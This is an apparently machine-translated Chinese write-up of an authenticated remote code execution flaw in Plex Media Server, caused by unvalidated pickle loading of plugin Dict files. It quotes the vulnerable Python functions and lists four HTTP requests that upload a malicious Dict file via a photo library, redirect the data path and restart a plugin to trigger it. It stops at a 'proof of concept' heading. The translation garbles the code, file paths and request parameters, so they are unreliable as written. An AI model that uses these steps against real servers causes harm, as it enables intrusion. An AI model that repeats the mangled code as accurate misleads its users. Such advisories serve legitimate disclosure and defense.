丛媒体服务器身份验证的Python反序列化/远端控制设备(窗口)

丛媒体服务器插件框架包含了一个缺陷,允许远程攻击者(验证用管理员权限)的上下文中执行任意Python代码当前操作系统的用户。具体来说,当一个“东西”文件加载对于一个给定的插件,unpickle内容没有验证。关键字文件可以通过相机上传远程交付功能。

让我们先看看在unpickle块。

这种逻辑可以观察到在C:\Program Files (x86)\Plex\Plex媒体服务器\ Resources \塞- ins - 513 b381af \ Framework.bundle \ \内容资源\ \ 1 \ Python版本\ PMS \ Dict.py:

def __load():全球__dict路径= " % s / Dict类型“%数据。__dataPath如果os.path.exists(路径):尝试:__dict = Data.__unpickle(路径)PMS.Log(“(框架)加载字典文件”):除了PMS.Log(“(框架)字典文件是腐败和无法加载”)__loadDefaults()其他:__loadDefaults ()

如果我们观察数据的定义。__unpickle C:\Program Files (x86)\Plex\Plex媒体资源服务器\ \塞- ins - 513 b381af \ Framework.bundle \ \内容资源\ \ 1 \ Python版本\ PMS \ Data.py:

def __unpickle(路径):f =开放(路径,“r”) obj = pickle.load (f) f.close()返回obj

很明显,pickle.loads()函数用于反序列化Dict的内容。攻击者可以工艺恶意Dict文件加载时,攻击者的选择的负载将被执行。

交付和触发机制需要几个步骤,但这可以自动化。这是一般流程:

1. 创建一个照片库在C:\Users\Public(可以是不同的)。

   POST /图书馆/章节? name = EvilLib&type = photo&agent = com.plexapp.agents.none&scanner =丛% 20照片% 20 scanner&language = en&importFromiTunes = &enableAutoPhotoTags =位置= C: \ \用户公开

2. 使用位置ID的反应,在这个库上传Dict类型文件。将创建的目录结构。

   POST /图书馆/元数据? createdAt = 1171387901文件名= myfolder /丛+媒体+服务器/插件+支持/数据/ com.plexapp.system / Dict&overwrite = true&locationID = 8 sectionid = 3 +类型= 13

3. 修改本地应用程序数据路径指向这个位置

   /:/控制台? LocalAppDataPath = C: \ \公共\ myfolder用户

4. 重启com.plexapp.system

   /:/插件/ com.plexapp.system /重新启动

概念验证